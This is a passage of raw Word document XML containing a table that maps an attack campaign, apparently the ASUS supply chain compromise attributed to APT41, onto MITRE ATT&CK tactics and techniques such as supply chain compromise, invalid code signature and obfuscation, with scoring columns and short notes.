          <w:p w14:paraId="7C983788" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7697593C" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="27474451" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w14:paraId="2B5856F5" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5435852C" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2442DCE7" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34213D52" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A3A3D7D" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2755E849" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25BD065F" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FAA39C9" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2077B49B" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w14:paraId="049838F0" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="770CB4C4" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D7FB326" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67087AAA" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B56BEFF" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59EA2469" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0683BFF1" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07673454" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D4F41B3" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF397A" w:rsidRPr="00B857D7" w14:paraId="362FF6AC" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75B51A61" w14:textId="6917055D" w:rsidR="00DF397A" w:rsidRDefault="00DF397A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FC1F1DA" w14:textId="44C89F51" w:rsidR="00DF397A" w:rsidRPr="00B857D7" w:rsidRDefault="00DF397A" w:rsidP="00E20C37">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677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E68005B" w14:textId="411D4B7A" w:rsidR="00DF397A" w:rsidRPr="00D81EFA" w:rsidRDefault="00DF397A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1195.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Compromise Software Supply Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46E25376" w14:textId="55E0A638" w:rsidR="00DF397A" w:rsidRDefault="00DF397A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A8BCBE" w14:textId="77777777" w:rsidR="00DF397A" w:rsidRPr="00B857D7" w:rsidRDefault="00DF397A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B5DADED" w14:textId="26559F97" w:rsidR="00DF397A" w:rsidRDefault="00DF397A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43E61BF6" w14:textId="512A1035" w:rsidR="00DF397A" w:rsidRDefault="00DF397A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DCB956A" w14:textId="44ADAD5D" w:rsidR="00DF397A" w:rsidRDefault="00DF397A" w:rsidP="00E20C37">
            <w:r>
              <w:t>[3] ASUS supply chain compromise (see APT41_001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7068" w:rsidRPr="00B857D7" w14:paraId="1703B69C" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349C9964" w14:textId="0481324D" w:rsidR="00EA7068" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B561A6" w14:textId="3E001855" w:rsidR="00EA7068" w:rsidRPr="008C730F" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="277012B8" w14:textId="4EF1C929" w:rsidR="00EA7068" w:rsidRPr="00D81EFA" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EA7068">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EA7068">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Masquerading: Invalid Code Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118AE899" w14:textId="2CBF156B" w:rsidR="00EA7068" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190A0190" w14:textId="77777777" w:rsidR="00EA7068" w:rsidRPr="00B857D7" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FEAABD5" w14:textId="39A57673" w:rsidR="00EA7068" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="899" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58CEDEE6" w14:textId="2435E9AF" w:rsidR="00EA7068" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1349F333" w14:textId="53042121" w:rsidR="00EA7068" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:r>
              <w:t>[3] See APT41_001 attacker uses valid ASUS code signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F11AC" w:rsidRPr="00B857D7" w14:paraId="7546C5D8" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15B685DE" w14:textId="4631CE7E" w:rsidR="004F11AC" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163A59E9" w14:textId="55019302" w:rsidR="004F11AC" w:rsidRPr="00B857D7" w:rsidRDefault="00E623C4" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57980554" w14:textId="2440765C" w:rsidR="004F11AC" w:rsidRPr="00D81EFA" w:rsidRDefault="00EA7068" w:rsidP="00E20C37">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1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E113E81" w14:textId="6D269FA1" w:rsidR="004F11AC" w:rsidRDefault="00E623C4" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7697D6A4" w14:textId="77777777" w:rsidR="004F11AC" w:rsidRPr="00B857D7" w:rsidRDefault="004F11AC" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A12547B" w14:textId="5E9E1711" w:rsidR="004F11AC" w:rsidRDefault="00E623C4" w:rsidP="00E20C37">
            <w:pPr>
